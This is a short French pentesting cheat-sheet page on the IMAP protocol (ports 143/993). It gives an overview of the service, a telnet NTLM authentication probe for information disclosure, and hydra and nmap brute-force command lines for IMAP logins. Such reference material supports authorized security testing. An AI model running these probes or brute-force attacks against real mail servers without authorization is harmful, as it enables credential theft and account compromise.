IMAP - 143

1. Infos

Protocole d'accès aux messages Internet

IMAP vous permet d'accéder à vos mails où que vous soyez ; la plupart du temps, il est accessible via Internet. En principe, les messages électroniques sont stockés sur des serveurs. Chaque fois que vous consultez votre boîte de réception, votre client de messagerie contacte le serveur pour vous mettre en relation avec vos messages. Lorsque vous lisez un message électronique en utilisant IMAP, vous ne le téléchargez pas ou ne le stockez pas sur votre ordinateur, mais vous le lisez à partir du serveur.

Par défaut, le protocole IMAP fonctionne sur deux ports :

  • Port 143 - Par défaut, non sécurisé

  • Port 993 - Port IMAP sécurisé

PORT    STATE SERVICE 
143/tcp open  imap

2. NTLM Auth - Information disclosure

telnet PILOU.com 143 
* OK The Microsoft Exchange IMAP4 service is ready. 
>> a1 AUTHENTICATE NTLM

3. BruteForce

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
PreviousMSRPC - 135/593NextSMB - 445

Last updated